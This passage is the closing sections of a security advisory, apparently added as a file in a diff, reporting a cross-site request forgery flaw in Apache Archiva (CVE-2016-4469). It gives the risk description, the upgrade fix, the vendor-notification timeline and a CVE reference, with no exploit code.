+ + + + + + + + + + + +6. RISK +======= +To successfully exploit this vulnerability a user with administrative rights +must be tricked into visiting an arbitrary website while having an +authenticated session in the application. + +The vulnerability allows remote attackers to perform sensitive +administrative actions like adding new repository proxy connectors, adding +new repositories, editing existing repositories, adding legacy artifact +paths, changing the organizational appearance or uploading new artifacts in +the authentication context of the targeted user. + + +7. SOLUTION +=========== +Upgrade/Migrate to Apache Archiva 2.2.1 + + +8. REPORT TIMELINE +================== +2016-05-31: Discovery of the vulnerability +2016-05-31: Notified vendor via public security mail address +2016-06-06: No response, sent out another notification +2016-06-10: Vendor states that this version is out of support +2016-06-21: Vendor assigns CVE-2016-4469 +2016-07-11: Advisory released + + +9. REFERENCES +============= +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4469